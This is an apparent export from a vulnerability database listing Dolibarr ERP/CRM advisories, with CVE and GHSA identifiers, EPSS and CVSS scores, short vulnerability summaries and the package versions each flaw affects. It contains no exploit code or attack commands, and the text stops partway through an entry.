| 0 |
| url |
VCID-11u2-56qq-cye4 |
| vulnerability_id |
VCID-11u2-56qq-cye4 |
| summary |
SQL Injection
An issue was discovered in Dolibarr `expensereport/card.php` in the expense reports module allows SQL injection via the `integer` parameters `qty` and `value_unit`. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2018-16809 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00707 |
| scoring_system |
epss |
| scoring_elements |
0.72548 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00707 |
| scoring_system |
epss |
| scoring_elements |
0.72576 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00707 |
| scoring_system |
epss |
| scoring_elements |
0.72595 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00707 |
| scoring_system |
epss |
| scoring_elements |
0.72588 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2018-16809 |
|
| 1 |
|
| 2 |
|
| 3 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@7.0.1 |
| purl |
pkg:composer/dolibarr/dolibarr@7.0.1 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 6 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 7 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 8 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 9 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 10 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 11 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 12 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 13 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 14 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 15 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 16 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 17 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 18 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 19 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 20 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 21 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 22 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 23 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 24 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 25 |
| vulnerability |
VCID-ehb1-ac3n-p7fv |
|
| 26 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 27 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 28 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 29 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 30 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 31 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 32 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 33 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 34 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 35 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 36 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 37 |
| vulnerability |
VCID-nmjf-yxwc-m7hj |
|
| 38 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 39 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 40 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 41 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 42 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 43 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 44 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 45 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 46 |
| vulnerability |
VCID-uzz6-3bze-mbez |
|
| 47 |
| vulnerability |
VCID-v5bc-wjmv-ubhx |
|
| 48 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 49 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 50 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 51 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 52 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 53 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 54 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 55 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1 |
|
|
| aliases |
CVE-2018-16809, GHSA-h34q-878w-w96r
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-11u2-56qq-cye4 |
|
| 1 |
| url |
VCID-1225-a2a6-bkan |
| vulnerability_id |
VCID-1225-a2a6-bkan |
| summary |
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Cross Site Scripting vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the REST API module, related to analyseVarsForSqlAndScriptsInjection and testSqlAndScriptInject. |
| references |
| 0 |
| reference_url |
http://dolibarr.com |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
9.6 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H |
|
| 1 |
| value |
CRITICAL |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 2 |
| value |
Track* |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:01:54Z/ |
|
|
| url |
http://dolibarr.com |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
|
| aliases |
CVE-2023-38888, GHSA-62wf-h26v-5m57
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-1225-a2a6-bkan |
|
| 2 |
| url |
VCID-1jh7-xexf-53cw |
| vulnerability_id |
VCID-1jh7-xexf-53cw |
| summary |
Dolibarr ERP and CRM malicious executable loading
Dolibarr ERP/CRM 9.0.1 provides a web-based functionality that backs up the database content to a dump file. However, the application performs insufficient checks on the export parameters to mysqldump, which can lead to execution of arbitrary binaries on the server. (Malicious binaries can be uploaded by abusing other functionalities of the application.) |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2019-11200 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.0116 |
| scoring_system |
epss |
| scoring_elements |
0.78931 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.0116 |
| scoring_system |
epss |
| scoring_elements |
0.78955 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.0116 |
| scoring_system |
epss |
| scoring_elements |
0.78964 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.0116 |
| scoring_system |
epss |
| scoring_elements |
0.78958 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2019-11200 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
| 6 |
|
| 7 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@9.0.2 |
| purl |
pkg:composer/dolibarr/dolibarr@9.0.2 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 11 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 12 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 13 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 14 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 15 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 16 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 17 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 18 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 19 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 20 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 21 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 22 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 23 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 24 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 25 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 26 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 27 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 28 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 29 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 30 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 31 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 32 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 33 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 34 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 35 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 36 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 37 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 38 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 39 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 40 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 41 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 42 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 43 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 44 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 45 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2 |
|
| 1 |
| url |
pkg:composer/dolibarr/dolibarr@9.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@9.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 11 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 12 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 13 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 14 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 15 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 16 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 17 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 18 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 19 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 20 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 21 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 22 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 23 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 24 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 25 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 26 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 27 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 28 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 29 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 30 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 31 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 32 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 33 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 34 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 35 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 36 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 37 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 38 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 39 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 40 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 41 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 42 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 43 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 44 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 45 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.3 |
|
|
| aliases |
CVE-2019-11200, GHSA-2rwh-262r-r85j
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-1jh7-xexf-53cw |
|
| 3 |
| url |
VCID-1uje-n8xc-y7b7 |
| vulnerability_id |
VCID-1uje-n8xc-y7b7 |
| summary |
Dolibarr vulnerable to remote code execution via uppercase manipulation
Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data. |
| references |
| 0 |
|
| 1 |
| reference_url |
https://github.com/Dolibarr/dolibarr |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 2 |
| value |
Track* |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/ |
|
|
| url |
https://github.com/Dolibarr/dolibarr |
|
| 2 |
|
| 3 |
|
| 4 |
| reference_url |
https://www.swascan.com/blog/ |
| reference_id |
blog |
| reference_type |
|
| scores |
| 0 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
Track* |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/ |
|
|
| url |
https://www.swascan.com/blog/ |
|
| 5 |
|
| 6 |
|
| 7 |
|
|
| fixed_packages |
|
| aliases |
CVE-2023-30253, GHSA-9wqr-5jp4-mjmh
|
| risk_score |
10.0 |
| exploitability |
2.0 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-1uje-n8xc-y7b7 |
|
| 4 |
| url |
VCID-2wnq-rrff-tbbt |
| vulnerability_id |
VCID-2wnq-rrff-tbbt |
| summary |
Dolibarr has SQL injection vulnerability in the rowid parameter of the admin dict.php
Dolibarr ERP-CRM 8.0.4 contains an SQL injection vulnerability in the rowid parameter of the admin dict.php endpoint that allows attackers to execute arbitrary SQL queries. Attackers can inject malicious SQL code through the rowid POST parameter to extract sensitive database information using error-based SQL injection techniques. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2019-25710 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00036 |
| scoring_system |
epss |
| scoring_elements |
0.11275 |
| published_at |
2026-06-06T12:55:00Z |
|
| 1 |
| value |
0.00036 |
| scoring_system |
epss |
| scoring_elements |
0.11241 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00036 |
| scoring_system |
epss |
| scoring_elements |
0.11196 |
| published_at |
2026-06-04T12:55:00Z |
|
| 3 |
| value |
0.00036 |
| scoring_system |
epss |
| scoring_elements |
0.11284 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2019-25710 |
|
| 1 |
| reference_url |
https://github.com/Dolibarr/dolibarr |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.2 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N |
|
| 1 |
| value |
8.8 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N |
|
| 2 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
|
| url |
https://github.com/Dolibarr/dolibarr |
|
| 2 |
|
| 3 |
|
| 4 |
| reference_url |
https://www.dolibarr.org |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.2 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N |
|
| 1 |
| value |
8.8 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N |
|
| 2 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
|
| url |
https://www.dolibarr.org |
|
| 5 |
| reference_url |
https://www.exploit-db.com/exploits/46095 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.2 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N |
|
| 1 |
| value |
8.8 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N |
|
| 2 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 3 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T12:07:10Z/ |
|
|
| url |
https://www.exploit-db.com/exploits/46095 |
|
| 6 |
|
| 7 |
|
| 8 |
| reference_url |
https://www.dolibarr.org/ |
| reference_id |
www.dolibarr.org |
| reference_type |
|
| scores |
| 0 |
| value |
8.2 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N |
|
| 1 |
| value |
8.8 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N |
|
| 2 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T12:07:10Z/ |
|
|
| url |
https://www.dolibarr.org/ |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@8.0.5 |
| purl |
pkg:composer/dolibarr/dolibarr@8.0.5 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 4 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 5 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 6 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 7 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 8 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 9 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 10 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 11 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 12 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 13 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 14 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 15 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 16 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 17 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 18 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 19 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 20 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 21 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 22 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 23 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 24 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 25 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 26 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 27 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 28 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 29 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 30 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 31 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 32 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 33 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 34 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 35 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 36 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 37 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 38 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 39 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 40 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 41 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 42 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 43 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 44 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 45 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 46 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 47 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 48 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 49 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@8.0.5 |
|
|
| aliases |
CVE-2019-25710, GHSA-xxxg-x793-7fq3
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-2wnq-rrff-tbbt |
|
| 5 |
| url |
VCID-3cg6-pnf4-jkc1 |
| vulnerability_id |
VCID-3cg6-pnf4-jkc1 |
| summary |
Business Logic Errors in Packagist dolibarr/dolibarr |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2022-0414 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00326 |
| scoring_system |
epss |
| scoring_elements |
0.55861 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00326 |
| scoring_system |
epss |
| scoring_elements |
0.5591 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00326 |
| scoring_system |
epss |
| scoring_elements |
0.55923 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00326 |
| scoring_system |
epss |
| scoring_elements |
0.55917 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2022-0414 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@15.0.0 |
| purl |
pkg:composer/dolibarr/dolibarr@15.0.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 3 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 4 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 5 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 6 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 7 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 8 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 9 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 10 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 11 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 12 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 13 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 14 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 15 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 16 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 17 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 18 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 19 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 20 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 21 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 22 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 23 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 24 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 25 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0 |
|
| 1 |
|
|
| aliases |
CVE-2022-0414, GHSA-f768-8pvq-mm6r
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-3cg6-pnf4-jkc1 |
|
| 6 |
| url |
VCID-3dpn-ry9j-rff6 |
| vulnerability_id |
VCID-3dpn-ry9j-rff6 |
| summary |
Unrestricted Upload of File with Dangerous Type
Dolibarr ERP/CRM allows low-privilege users to upload files of dangerous types, which can result in arbitrary code execution within the context of the vulnerable application. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2017-9840 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00698 |
| scoring_system |
epss |
| scoring_elements |
0.72364 |
| published_at |
2026-06-07T12:55:00Z |
|
| 1 |
| value |
0.00698 |
| scoring_system |
epss |
| scoring_elements |
0.72336 |
| published_at |
2026-06-04T12:55:00Z |
|
| 2 |
| value |
0.00698 |
| scoring_system |
epss |
| scoring_elements |
0.72378 |
| published_at |
2026-06-05T12:55:00Z |
|
| 3 |
| value |
0.00698 |
| scoring_system |
epss |
| scoring_elements |
0.72384 |
| published_at |
2026-06-06T12:55:00Z |
|
|
| url |
